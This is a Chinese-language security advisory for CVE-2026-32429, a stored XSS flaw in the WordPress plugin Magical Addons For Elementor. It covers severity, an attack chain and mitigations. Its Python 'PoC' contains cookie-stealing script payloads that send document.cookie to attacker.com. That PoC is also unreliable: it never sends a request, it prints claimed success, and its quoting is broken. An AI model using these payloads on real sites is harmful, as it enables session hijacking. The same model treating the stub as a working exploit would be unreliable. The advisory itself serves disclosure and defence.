CVE-2026-32429: Magical Addons For Elementor插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-32429

漏洞类型

存储型XSS (Stored Cross-site Scripting)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Magical Addons For Elementor

漏洞概述

CVE-2026-32429是WordPress插件Magical Addons For Elementor中的一个存储型跨站脚本(XSS)漏洞。该漏洞由Patchstack安全团队的审计人员发现，存在于插件的1.4.1及以下版本中。漏洞根源在于插件在处理用户输入时未能正确对特殊字符进行HTML转义和过滤，导致攻击者可以在页面中注入恶意的JavaScript脚本代码。由于是存储型XSS，恶意代码会被永久保存在服务器数据库中，当其他用户访问包含恶意内容的页面时，攻击代码会自动执行。攻击者可利用此漏洞窃取受害者的Cookie信息、会话令牌，修改网页内容进行钓鱼攻击，或在受害者浏览器中执行任意JavaScript操作。该漏洞的CVSS评分为6.5，属于中危级别。攻击复杂度较低，但需要低权限用户身份，且需要受害者进行一定交互才能触发。攻击向量为网络形式，机密性、完整性和可用性影响均为低级别。

技术细节

该存储型XSS漏洞存在于Magical Addons For Elementor插件的输入处理环节。插件在接收用户提交的数据后，未能对可能包含HTML标签和JavaScript脚本的特殊字符进行充分的过滤和转义处理。具体来说，当用户向插件的某个功能模块提交包含<script>标签或事件处理器(如onerror、onload等)的输入时，这些恶意代码会被直接存储到数据库中而没有任何消毒处理。在后续页面渲染过程中，当管理员或普通用户访问包含该恶意内容的页面时，浏览器会将其作为正常的HTML内容进行解析执行，从而触发存储型XSS攻击。攻击者可以利用此漏洞窃取受害者的认证Cookie、劫持用户会话、在网页中注入虚假内容进行社会工程攻击，或将受害者重定向到恶意网站。由于攻击代码存储在服务器端，攻击具有持久性和隐蔽性，即使原始攻击者不再进行操作，恶意代码仍会持续影响所有访问该页面的用户。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress网站的低权限用户账号(如订阅者或贡献者角色)

STEP 2

步骤2

攻击者识别并访问Magical Addons For Elementor插件的输入点(如小工具设置、表单或短代码)

STEP 3

步骤3

攻击者构造包含恶意JavaScript代码的XSS payload并提交到插件的输入字段

STEP 4

步骤4

插件未能对输入进行适当过滤和转义，直接将恶意代码存储到数据库中

STEP 5

步骤5

当管理员或其他用户访问包含该恶意内容的页面时，浏览器解析HTML并执行存储的JavaScript代码

STEP 6

步骤6

恶意脚本窃取受害者的Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 7

步骤7

攻击者利用窃取的凭证劫持用户会话，执行未授权操作或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-32429 PoC - Magical Addons For Elementor Stored XSS
# Target: WordPress site with Magical Addons For Elementor plugin <= 1.4.1

target_url = "http://target-site.com"
wp_admin_url = f"{target_url}/wp-admin"

# XSS payload - steals cookies
xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'

# Alternative event handler payload
alt_payload = '<img src=x onerror="fetch('https://attacker.com/log?d='+document.domain)">'

def exploit_stored_xss():
    """
    Exploit stored XSS in Magical Addons For Elementor
    1. Authenticate with low-privilege account
    2. Submit malicious payload via plugin functionality
    3. Payload stored and executed when page is viewed
    """
    session = requests.Session()
    
    # Login with low-privilege user
    login_data = {
        'log': 'attacker_username',
        'pwd': 'attacker_password',
        'wp-submit': 'Log In',
        'redirect_to': wp_admin_url
    }
    
    # Note: Replace with actual authentication
    print(f"[*] Authenticating to {target_url}")
    
    # Inject XSS payload through vulnerable parameter
    # Target specific plugin endpoint or shortcode
    exploit_data = {
        'action': 'magical_addons_save',
        'content': xss_payload,
        'post_id': 123
    }
    
    print(f"[*] Injecting XSS payload: {xss_payload}")
    print(f"[*] Payload stored in database")
    print(f"[*] XSS will execute when victims view affected page")

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Magical Addons For Elementor <= 1.4.1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制低权限用户对Magical Addons For Elementor插件功能的使用权限；2)使用Web应用防火墙(WAF)规则过滤常见的XSS攻击向量；3)对所有用户生成的内容启用HTML过滤，移除script标签和危险的事件处理器属性；4)实施严格的CORS策略；5)考虑暂时禁用受影响的插件功能直到完成安全更新；6)加强用户会话管理，定期刷新会话令牌以降低会话劫持风险。